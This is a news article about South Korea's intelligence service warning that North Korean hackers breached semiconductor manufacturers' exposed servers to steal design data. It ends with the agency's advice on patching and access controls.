The National Intelligence Service (NIS) in South Korea warns that North Korean hackers target domestic semiconductor manufacturers in cyber espionage attacks.
NIS says these attacks increased in the second half of 2023 until recently, targeting internet-exposed servers vulnerable to known flaws for initial access to corporate networks.
Once the network was breached, the threat actors stole data from servers holding sensitive documents and data.
In the cases observed by the NIS, the North Korean adversaries used “living off the land” tactics, which entails abusing legitimate software tools for malicious purposes to evade detection by security products.
The NIS mentions at least two cyberattacks on separate entities, occurring in December 2023 and February 2024, where the company’s configuration management and security policy servers were hacked.
This reportedly resulted in the compromise of product design drawings and facility site photos, among other sensitive data.
The two victims aren’t named in the report, but it is worth noting that South Korea is home to two leading chipmakers, Samsung Electronics and SK Hynix, who develop and produce a wide range of processor, system-on-chips, and DRAM, and NAND flash products.
According to the US Department of Commerce, Samsung Electronics and SK Hynix are responsible for 73 percent of the global DRAM market share and 51 percent of the NAND flash market.
The two firms play critical roles in the global semiconductor supply chain, providing chips for a wide array of notable firms across various industries globally, including Apple, Google, Microsoft, Amazon, Sony, Dell, and many automotive and consumer electronic makers.
NIS reckons that these cyberattacks are aimed at collecting valuable technical information that the North Korean regime could use to develop its own chip-making program and cover military equipment needs.
The intel org says it notified the domestic victims of the cyberattacks and provided recommendations on detecting and stopping them.
An NIS official also highlighted the importance of applying security updates and strict access controls on internet-exposed servers, as well as consistently applying and updating robust authentication processes for administrators to prevent unauthorized access via hijacked privileged accounts.